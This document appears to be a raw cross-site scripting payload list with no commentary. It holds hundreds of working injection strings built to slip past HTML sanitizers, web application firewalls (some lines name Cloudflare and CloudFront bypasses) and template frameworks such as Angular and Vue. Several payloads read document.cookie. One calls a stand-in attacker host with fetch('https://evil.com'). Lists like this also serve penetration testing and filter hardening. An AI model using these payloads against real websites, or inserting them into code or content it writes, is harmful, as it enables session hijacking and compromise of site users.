<img usemap=#x><map name="x"><area href onfocus=alert(1) id=x>
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>
<img+<iframe ="1" onerror="alert(1)">
<img+src%3dOnXSS+OnError%3dalert('XSs-Cloudflare-bypass-By-Dedi')>
<img+src=1+onerror=alert(1)>&anything_else=test
<img+src=oNlY=1+ onerror="alert(['a', 'x', 'b', 'x', 'c', 's'].map(c => c.replace(/[abc]/g, '')).join(''))">
<img+src=oNlY=1+ onerror="alert(['x', String.fromCharCode(121), 'x', 's'].filter(c => c.charCodeAt(0) !== 121).join(''))
<img/anyjunk/onerror=alert(1) src=a>
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
<img/src/onerror=&#8196;alert&#65279;(31337)>
<img/src/onerror=alert&#xFEFF;(1337)>
<img/src/onerror=alert&sol;**&sol;(3)>
<img/src/onerror=alert(1)
<img/src/onerror=alert(`bluesecc`)>
<img/src/onerror=alert/*1337*/(1)>
<img/src/onerror=alert//&NewLine;(2)>
<img/src="funny.jpg"onload=javascript:eval(alert('Successful&#32XSS'))>
<img/src='1'/onerror=alert(0)>
<img/src=a onerror="windowT[‘alert'|(document.cookie)"/>
<img/src=a onerror="window['alert'](document.cookie)"/>
<img/src=x onError="`${x}`;alert(`Ex.Mi`);">
<img/src=x onError="`${x}`;alert(`XSS`);">
<img/src=x/onerro=6><img/src="1"/onerror=alert(1);>?test=test
<img/src=xon=()onx+honerror=alert(1)>ss<svg/onload=prompt(document.domain)%20>
<img/’onerror=alert(1) src=a>
<img[%09]onerror=alert(1) src=a>
<img[%0a]onerror=alert(1) src=a>
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
<input autofocus onfocus=alert(1)>
<input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(1)'>
<input id=x ng-focus=$event.composedPath()|orderBy:'(z=alert)(1)'>}}
<input ng-cut=$event.composedPath()|orderBy:'(y=alert)(1)'>
<input onauxclick=alert(1)>
<input onblur="alert('XSS')" value="Blur me">
<input onblur=javascript:alert(1) autofocus><input autofocus>
<input onf%0Aocus=alert(1) autofocus/
<input onfocus="alert(0);" autofocus>
<input onfocus=javascript:alert(1) autofocus>
<input oninput=alert(1) value=xss>
<input type="button" value="XSS" onclick="alert('XSS')">
<input type="hidden" accesskey="X" onclick="alert(1)">
<input type="image" src="invalid" onerror="alert('XSS')">
<input type="image" src="javascript:alert('Successful XSS')">
<input type="text" value="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"></input>
<input type="text" value="javascript:alert('XSS')">
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
<input type='text' value='jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'></input>
<input type=image src=1 onerror=alert(1)>
<input type=text value=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e></input>
<isindex action="javascript:alert('XSS')">
<isindex action=javascript:alert(1) type=image>
<isindex action=javascript:alert(1) type=submit value=click>
<isindex formaction=javascript:alert(1) type=submit value=click>
<isindex type=image src=1 onerror=alert(XSS)>
<isindex x="javascript:" onmouseover="alert(XSS)">
<isindex+type=image+src=1+onerror=alert(1)>
<java contentEditable='' autofocus='' onfocus=location=tagName+innerHTML+location.hash>script:/*#*/alert(1)
<keygen autofocus onfocus=alert(1)>
<label id=x tabindex=1 onfocus=alert(1)></label>
<label onfocus=alert(1) autofocus tabindex=1>
<li style=list-style:url() onerror=javascript:alert(/AmoloHT/)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(/AmoloHT/)></div>
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<link rel="import" href="data:text/html,<script>alert('XSS')</script>">
<link rel="stylesheet" href="#" onload="window.alert('XSS_WAF_BYPASS')">
<link rel="stylesheet" href="data:text/css,*{background:url('javascript:alert(XSS)')}">
<lol/onauxclick=[0].some(alert)>rightclickhere
<mark onfocus=alert(1) autofocus tabindex=1>
<marquee loop=1 onfinish=alert( )>x
<marquee loop=1 width=0 onfinish=alert`1`>XSS</marquee>
<marquee onstart="alert('XSS')">Start</marquee>
<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
<marquee onstart=alert(1)>
<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>
<math href="javascript:alert('XSS')" />
<math href="javascript:javascript:alert(1)">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<math><brute href=javascript:alert(1)>click
<math><brute xlink:href=javascript:alert(1)>click
<math><style><img src onerror=alert(2)></style></math>
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(/AmoloHT/)" http-equiv="refresh"/>
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<meta http-equiv="refresh" content=" ; url=javascript:alert('XSS');">
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
<meta style="xss:expression(open(alert(1)))" />
<meter onmouseover="alert(1)"
<meter value=" " min=" " max=" " low=" " high=" " onmouseover="alert('XSS')"></meter>
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
<noembed><img title="</noembed><img src onerror=alert(1)>"></noembed>
<noframes><img title="</noframes><img src onerror=alert(1)>"></noframes>
<noscript><img title="</noscript><img src onerror=alert(1)>"></noscript>
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
<object data="javascript:alert(XSS)">
<object data=javascript:alert(1)>
<object onError object onError="javascript:javascript:alert(1)"></object onError>
<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>
<object onerror=javascript:javascript:alert(1)>
<object src=1 href=1 onerror="javascript:alert(1)"></object>
<object+data="javascript:alert(0)">
<object/data="javascript&colon;alert/**/(document.domain)">//
<object/data=javascript:alert()>
<object><param name="src" value="javascript:alert(0)"></param></object>
<ol onfocus=alert(1) autofocus tabindex=1>
<optgroup label="XSS" onmouseenter="alert('XSS')"></optgroup>
<p :=_c.constructor`alert(1)`()>
<p onfocus=alert(1) autofocus tabindex=1>
<p v-show="_c.constructor`alert(1)`()">
<p><img/src/onerror=alert(`bluesecc`)></p>
<plaintext onfocus=alert(1) autofocus tabindex=1>
<progress onmouseover="alert('XSS')"></progress>
<s%00c%00r%00i%00p%00t>alert(1)</script>
<s<script>cript>alert()</s<script>cript>
<sCRipT>alert(1)</sCRiPt>
<sVg><scRipt >alert&lpar;1&rpar; {Opera}
<s\Cr\ipt\>alert(document\.cookie)<\/s\Cr\ipt\>\;\/>
<sc%00ript/test='asdf'>alert/**/(1)</script>
<sc<script>ript>alert(123)</sc</script>ript>
<scr'+'ipt>alert(1)</scr'+'ipt>
<scr<object>ipt>alert(1)</script>
<scr<script>ipt>alert('XSS')</scr</script>ipt>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
<scr<script>ipt>alert(1);</scr</script>ipt>
<scr<script>ipt>alert(1)</scr</script>ipt>
<scr<script>ipt>alert(1)</script>
<scr\uffffipt>alert(0)</script>
<scr\x00ipt>alert(1)</scr\x00ipt>
<script ,>alert()</script>
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
<script /**/>/**/alert(/AmoloHT/)/**/</script /**/
<script /**/>/**/alert(1)/**/</script /**/
<script ^__^>alert(String.fromCharCode(49))</script ^__^
<script charset="\x22>javascript:alert(1)</script>
<script itworksinallbrowsers>/*<script* */alert(1)</script
<script onreadystatechange=alert(1)>
<script src="data:,alert(1)">/</script>
<script src="data:text/javascript,alert(1)"></script>
<script src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1…)"></script>
<script src="javascript:alert(1)">
<script src=data:text/javascript,alert(1)></script>
<script src=data:text/javascript,print()>
<script src=javascript:alert(1)>
<script x> alert(1) </script 1=2
<script x>alert('XSS')<script y>
<script ~~~>alert(0%0)</script ~~~>
<script%00>alert(1)</script%00>
<script%20TEST>alert(1)</script%20TESTTEST>
<script/%00%00v%00%00>document.location.href=location.hash.slice(1)</script>#javascript:alert(document.cookie)
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
<script> http://window.name=`<img src=x onerror=alert(top.document.domain)>` location=`https://domain/?xss=<iframe src=javascript:src=http://top.name>x</iframe>` </script>
<script>$=1,alert($)</script>
<script>%0d%0aalert(1)</script>
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
<script>+-+-1-+-+alert(1)</script>
<script>/&/-alert(1)</script>
<script>/*<![CDATA[*/alert(1)//]]></script>
<script><script>alert(1)</script>
<script>alert&DiacriticalGrave;1&DiacriticalGrave;</script>
<script>alert("WXSS")</script>
<script>alert('XSS')</script>
<script>alert('\u0031')</script>
<script>alert()</script>”/></style>
<script>alert(/Chrome%20XSS%20filter%20bypass/);</script>
<script>alert(1)</script>
<script>alert(1)</script>.asp
<script>alert(1)</script>.aspx
<script>alert(1)</script>.htm
<script>alert(1)</script>.html
<script>alert(1)</script>.php
<script>alert(1234)</script>
<script>alert(['X','S','S'].join(''))</script>
<script>alert(document.cookie)</script>
<script>alert(document.domain)</script>
<script>alert(document[‘cookie’])</script>
<script>alert(“xss”)</script>
<script>alert\u00281\u0029</script>
<script>alert`1`</script>
<script>fetch('https://evil.com')</script>
<script>function::[‘alert’](1)</script>
<script>import('data:text/javascript,alert(1)')</script>
<script>javascript:alert(1)</script>
<script>javascript:alert(1)</script\x0A
<script>javascript:alert(1)</script\x0B
<script>javascript:alert(1)</script\x0D
<script>javascript:alert(1)<\x00/script>
<script>location='javascript:alert\x281\x29'</script>
<script>onerror=alert;throw 1337</script>
<script>onerror=alert;throw 1</script>
<script>print()</script>
<script>prompt(1)</script>
<script>throw onerror=alert,1</script>
<script>throw onerror=eval,e=new Error,e.message='alert\x281\x29',e</script>
<script>throw[onerror]=[alert],1</script>
<script>top['al'+'ert'](1)</script>
<script>top[`alert`]()</script>
<script>var x=Function('print()');x();</script>
<script>var{a:onerror}={a:alert};throw 1</script>
<script>var{haha:onerror=alert}=0;throw 1</script>
<script>with(document)alert(cookie)</script>
<script>{onerror=alert}throw 1</script>
<script>’alert(1)’.replace(/.+/,eval)</script>
<script\x20type="text/javascript">javascript:alert(1);</script>
<select autofocus onfocus=alert(1)>
<select onchange="alert('XSS')"><option>Option</option></select>
<shadow onfocus=alert(1) autofocus tabindex=1>
<strong><button popovertarget="x"></button><test onbeforetoggle="alert(document.domain)" popover id="x"></test></strong>
<strong><button popovertarget="x">click me</button><test onbeforetoggle="alert(document.domain)" popover id="x">aaa</test></strong>
<style onreadystatechange=alert(1)>
<style onreadystatechange=javascript:javascript:alert(1);></style>
<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
<style>*{background-image: url(javascript:alert('XSS'))}</style>
<style>//*{x:expression(alert(/xss/))}//<style></style>
<style><img src="</style><img src=x onerror=javascript:alert(/AmoloHT/)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<style><img title="</style><img src onerror=alert(1)>"></style>
<style>@import 'javascript:alert(XSS)';</style>
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss>
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>
<style>img{background-image:url('javascript:alert(1)')}</style>
<style>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</style>
<svg %09onload=alert(1)>
<svg id=`x`onload=alert(1)>
<svg id=alert(1) onload=eval(id)>
<svg id=x;onload=alert(1)>
<svg on onload=(alert)(document.domain)>
<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
<svg onauxclick='a=alert;b=document;a(b.domain)'>
<svg onfocus=alert(1) autofocus tabindex=1>
<svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
<svg onload%09%20%28%2c%3b=alert(1)>
<svg onload=alert (1337)&nvgt;
<svg onload=alert%26%230000000040"")>
<svg onload=alert%26%230000000040"1")>
<svg onload=alert&#0000000040"1")>
<svg onload=alert&#0000000040document.cookie)>
<svg onload=alert("")>
<svg onload=alert(1)//
<svg onload=alert(1)>
<svg onload=alert(document.domain)>
<svg onload=print()>
<svg onload=prompt(1)>
<svg onload=window['al'+'ert'](1)>
<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
<svg%09%0a%0b%0c%0d%a0%00%20onload=alert (1)>
<svg%20oNinad=1%20onload=alert(document.cookie)>
<svg%20onload=alert%28document.domain%29>
<svg/%6f%6e/oNloaD=alert``>
<svg/&parameter=onload=alert()>
<svg////////onload=alert(1)>
<svg/on%20onload=alert(1)>
<svg/onload=%26nbsp;alert`bohdan`+
<svg/onload='+/"`/+/onmouseover=1/+/[*/[]/+alert(42);//'>
<svg/onload='alert&#40 23 &#41'>
<svg/onload=alert('XSS')>
<svg/onload=alert(1)
<svg/onload=alert(1)>
<svg/onload=alert(1)>"@gmail.com
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg/onload=alert(“Hacked”)>
<svg/onload=window[atob('YWxlcnQ=')](1)>
<svg/onload​=alert&#x2F;**&#47;(5)>
<svg/onload​=alert&sol;**&sol;(3)>
<svg/onload​=alert/&#42;&#42;/(4)>
<svg/onload​=alert/*1337*/(1)>
<svg/onload​=alert//&NewLine;(2)>
<svg></p><style><g title="</style><img src onerror=alert(document.domain)>">
<svg><a xlink:href="javascript:alert(1)">click</a></svg>
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
<svg><animate attributeName="xlink:href" to="javascript:alert('XSS')" /></svg>
<svg><animate attributeName=href to=javascript:alert(1) dur=1s/></svg>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
<svg><animate onend=alert(1) attributeName=x dur=1s>
<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />
<svg><foreignObject><body onload=alert(1)></body></foreignObject></svg>
<svg><foreignObject><body onload=print()></body></foreignObject></svg>
<svg><image href=1 onerror=alert(1)>
<svg><path><animateMotion onbegin=alert(1) dur="1s" repeatCount="1">
<svg><script ?>alert(1)
<svg><script href=data:,alert(1) />(
<svg><script onlypossibleinopera:-)> alert(1)
<svg><script xlink:href="{ASCII}data:,alert(1)"></script></svg>
<svg><script xlink:href=data:,alert(1) />
<svg><script xlink:href=data:text/javascript,alert(1)></script></svg>
<svg><script>123<1>alert(123)</script>
<svg><script>alert&lpar;'1'&rpar;
<svg><script>print()</script></svg>
<svg><set attributeName=onload to="alert(1)"/></svg>
<svg@load=this.alert(1)>
<svg•onload=alert(1)>
<table background="javascript:javascript:alert(/AmoloHT/)">
<table background="javascript:javascript:alert(1)">
<teleport to=script:nth-child(2)>alert&lpar;1&rpar;</teleport></div><script></script>
<textarea autofocus onfocus=alert(1)>
<textarea><img title="</textarea><img src onerror=alert(1)>"></textarea>
<textarea>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</textarea>
<time onfocus=alert(1) autofocus tabindex=1>
<title><img title="</title><img src onerror=alert(1)>"></title>
<title>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e</title>
<track oncuechange="alert('XSS')"></track>
<ul onfocus=alert(1) autofocus tabindex=1>
<video autoplay onplay=alert`1` src=//w3schools.com/tags/movie.mp4>
<video controls src=1 onfocus=alert(1) autofocus>
<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
<video onerror="javascript:javascript:alert(/AmoloHT/)"><source>
<video onerror="javascript:javascript:alert(1)"><source>
<video onfocus=alert(1) autofocus tabindex=1>
<video onfullscreenchange=alert(1) src=validvideo.mp4 controls>
<video onloadstart=alert()><source></*>
<video poster=javascript:javascript:alert(1)//
<video src=1 onerror=alert(1)>
<video src=_ onloadstart="alert(1)">
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video><source onerror="javascript:javascript:alert(/AmoloHT/)">
<video><source onerror="javascript:javascript:alert(1)">
<wbr onfocus=alert(1) autofocus tabindex=1>
<x #[_c.constructor`alert(1)`()]>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
<x :[_b.constructor`alert(1)`()]>
<x @[_b.constructor`alert(1)`()]>
<x @click=$event.view.alert(1)>click</x>
<x @click='_b.constructor`alert(1)`()'>click</x>
<x @click=_withCtx.constructor`alert(1)`()>click</x>
<x ng-app>{{constructor.constructor('alert(1)')()}}
<x onauxclick=a=alert,a(domain)>click
<x onmouseup=alert(1)>click this!
<x onxxx=alert(1) 1='
<x title"="&lt;iframe&Tab;onload&Tab;=alert(1)&gt;">
<x title"="&lt;iframe&Tab;onload&Tab;=setTimeout(/alert(1)/.source)&gt;">
<x v-bind:a='_b.constructor`alert(1)`()'>
<x v-html=_c.constructor('alert(1)')()>
<x v-if=_c.constructor('alert(1)')()>
<x v-on:click='_b.constructor`alert(1)`()'>click</x>
<x/oncopy=alert()>x
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>
<xml onreadystatechange=alert(1)>
<xmp><img title="</xmp><img src onerror=alert(1)>"></xmp>
<xss autofocus tabindex=1 onfocusin=alert(1)></xss>
<xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>
<xss class=progress-bar-animated onanimationstart=alert(1)>
<xss draggable="true" ondragexit-alert()>test</xss>
<xss draggable="true" ondragleave="alert(1)" style=display:block>test</xss>
<xss onafterscriptexecute=alert(1)><script>1</script>
<xss onbeforescriptexecute=alert(1)><script>1</script>
<xss onfocus=alert(1) autofocus tabindex=1>
<xss onkeypress="alert(1)" contenteditable style=display:block>test</xss>
<xss style="x:expression(alert('XSS'))">
<xss><script>alert('WXSS')</script></vulnerable>
<​script type="text/javascript">javascript​:alert(1);<​/script>
=<img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert%26%23x28;1%26%23x29;>
>"'><script>alert(2);</script>
>%0D%0A%0D%0A<x '=foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
>'"><script>alert(2);</script>
>'>"><script>alert();</script>
>'>"><svg/onload=alert(document.domain)>
>'><script>alert(2);</script>
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
><img/onerror="javascript:alert(1%26%23x000000029;" src=x>
><s %2b cript>alert(document.cookie)</script>
><s"%2b"cript>alert(document.cookie)</s"%2B"cript>
><sVg%2Fonload%3Dalert%281%29+class%3Dikhsan>
><script>alert(123);</script x=
><script>alert(123)</script>
><tag onxxxx="'a'|alert(1)">
><tag onxxxx=alert(1)>
>><marquee loop=1 width=0 onfinish=alert(1)>
>alert(1)</script>
??"><img/src/onerror=alert(document.domain)>
?__proto__[transport_url]=%3C%2fscript%3E%3Cscript%3Ealert(document.cookie)%3C%2fscript%3Eivl0w
?path=%2500%27onmouseover=%27window.stop();alert(document.domain)%27
?query=<img/src/onerror=alert(`bluesecc`)>
?url=%26%2302java%26%23115cript:alert(document.domain)
?url=javscript:alert(1)
?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
Enter_Mouse_Pointer_Here_to_get_XSS<P/onpointerenter="alert(1)">
Hh'><script>alert(1)</script>
IMG+LOWSRC="javascript:alert(1);">
JavaSCript:alert(123)
Javascript://%E2%80%A9alert(618)
Login.aspx?username=<img/src/onerror=alert(bluesecc)>
Reflect.apply.call`${alert}${undefined}${[23]}`
SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;
STYLE="xss:expr/*XSS*/ession(alert('XSS')">
Search/Results?q=<img/src/onerror=alert(`bluesecc`)>
Set.constructor`alert\x2845\x29`
Set.constructor`alert\x28document.domain\x29
Tarun~<"><details/open/ontoggle="jAvAsCrIpT&colon;alert&lpar;/xss-by-tarun/&rpar;">XXXXX</a>
VasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
XSS"%0D<body='X' onmouseover=setInterval`alert\x28&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#111;&#111;&#107;&#105;&#101;\x29`//
XSS_HERE_%EF%BC%9Cimg%20src%3Dxxx%20onerror%3Dalert(1)%EF%BC%9E
[" <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116&grave;1&grave;> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> "]
["');alert('1’);//"]@xyz.xxx
["');alert('XSS');//"]@xyz.xxx
["');alert('xss');//"]@xyz.xxx
[1].find(alert)
[1].map(alert)   or    (alert)(1)
[45].some.alert()
[[constructor.constructor('alert(document.cookie)')()]]
[].sort.call`${alert}23`
[]["filter"]["constructor"]("alert(1)")()
[a](javascript:window.onerror=alert;throw%201)
[alert][0].call(this,1)
\"-alert(1)}//
\";alert('XSS');//
\";alert(1);//
\"><iframe/src=javascript:alert%26%23x000000028%3b)>
\'-alert(1)//
\<a onmouseover="alert(document.cookie)"\>xxs link\</a\>
\<a onmouseover=alert(document.cookie)\>xxs link\</a\>
\<script\>alert(1)\<\/script\>
\u003cimg src onerror=alert(1)\u003e
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
\u003e\u003cimg src=1 onerror=alert(0)\u003e
\x3Cscript>javascript:alert(1)</script>
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
_0x68087f:alert(0x1);
`"'><img src='#\x27 onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
`"'><img src=xxx:x onerror\x09=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
`${alert(1)}`
`'";//><img/src=x onError="${x};alert(`1`);">
`-alert(1)">'onload="`<svg/1='
`javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>/alert()/
`payload´; %3Cimg src='null' onerror=alert('spyerror')%3E
a'-alert(1)//
a=`\u003c`,b=`\u003e`,location=`javascript:[].findIndex(dump)+(/${a}img src=# onerror=alert(1)${b}/.source)`
a=alert,a(1)
abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
alert = window["al"+"ert"]
alert##<script>prompt(1234)</script>
alert(1)
alert(1)" data-orig-proto="javascript" href="javascript://
alert(1)">clickme</a>
alert(String.fromCharCode(88))</SCRIPT>
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
alert(document.domain)
alert(document['cookie'])
alert?.(1)
alert?.(document?.cookie)
alert`1`
alert`23`
anything&callback=";alert`XSS_POC_BY_SAAJAN_BHUJEL`;//
anything&callback=%22;alert%60XSS_POC_BY_SAAJAN_BHUJEL%60;%2f%2f
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
anythinglr00</script><script>alert(document.domain)</script>uxldz
asdf"onload%3d"alert('Slax Was Here!')"asdf
autofocus ' onfocus='alert(document.domain)'
ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6
ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 -@naglinagli
banner.swf?clickTAG=javascript:alert(1);//
blalala');alert(1);('a
bluesecc"*alert(1)*"
constructor.constructor('alert(1)')()
d1bvs%3c%2fscript%3e%3cscript%3ealert(`XSS`)%3c%2fscript%3ec579g
d1bvs</script><script>alert(`XSS`)</script>c579g
d="alert('XSS');\")";
data:text/html,<script>alert(0)</script>
data:text/html,<script>alert(1)</script>
dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi
document.body.innerHTML="&ltimg src=x onerror=alert&lpar;23&rpar;&gt"
document.body.innerHTML="\u003cimg src=x onerror=alert\u002823\u0029\u003e";
document.createElement('div').innerHTML = "<img src=1 onerror=alert()>
document.location='javascript:alert%2823%29'
echo('IPT>alert("XSS")</SCRIPT>'); ?>
eval('alert(1)');
eval.apply`${[`alert\x2823\x29`]}`
eval.call`${'alert\x2823\x29'}`
fileName=')},1000);alert("XSS`);//
foo%00<script>alert(document.cookie)</script>
foo<script>alert(document.cookie)</script>
foo?q=foo<script>alert('xss')<%2fscript>
guest/msft_a_guest_register.php?_browser=1&title="><svg/onload=alert(1)>
http://example.com/?%0aalert(23)
http://www.<script>alert(1)</script .com
http://www.google<script .com>alert(document.location)</script
ignition/scripts/--><svg%20onload=alert%28document.domain%29>
img{background-image:url('javascript:alert()')}
io.swf?yid=\"));}catch(e){alert(1);}//
jAvaScripT:(alert)`1`
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
jaVasCript:/*`/*\`/*'/*\"//"/**/(onload=alert())//<svg/onload=alert()><frame/onload=alert()></select></noscript></noembed></template></stYle/</titLe/</teXtarEa/</script/--><sVg/oNloAd= alert()//>
jaVasCript:/--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[/[]/+alert(1)//'>
jaVasCript:\/*-\/*`\/*\\`\/*\'\/*\"\/**\/(\/* *\/oNcliCk=alert() )\/\/%0D%0A%0D%0A\/\/<\/stYle\/<\/titLe\/<\/teXtarEa\/<\/scRipt\/--!>\\x3csVg\/<sVg\/oNloAd=alert()\/\/>\\x3e
jane('"><script>alert(2)</script>)@gmail.com
java%09script:alert(1)
java%0d%0ascript%0d%0a:alert(document.domain);//
javaScRipt:Alert(‘1’)
javas%09cript:ghi=%27)%3E%27,you=%27(top%5B%22docum%22%2B%22ent%22%5D.cookie%27;HTMLElement%5B%27inne%27%2B%27rHTML%27%5D=%27%3CSvg/OnLoad=alert%27%2Brob%2Beco;//
javascript%3Avar%7Ba%3Aonerror%7D%3D%7Ba%3Aalert%7D%3Bthrow%2520document.cookie
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
javascript&#58;alert(1)
javascript&#58;alert(1);
javascript&#x00000003A;alert&#x000000028;2&#x000000029;&#x00000003B;
javascript&#x003A;alert(1)
javascript&colon;alert(1)
javascript&colon;alert(1);
javascript:"/*'/*\"/*` /**/alert()//--></title></textarea></style></noscript></noembed></template></script><script>alert()</script><svg/<frame/onload=alert()>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script>
javascript:"/*'//`//\"//</title></template/</textarea/</style/</noscript/</noembed/</script>--><<script>alert()<</script><frame/*/ onload=alert()//>
javascript:"/*\"/*'/*--></title></textarea></style></noscript></template></noembed></script><<script>/*` /*<frame src=javascript:/**/alert()//><</script>
javascript:"/*\"/*'/*`/*--></noembed></template></noscript></title></textarea></style></script></select><frame/onload=alert()><<svg/onload= /**/alert()//>
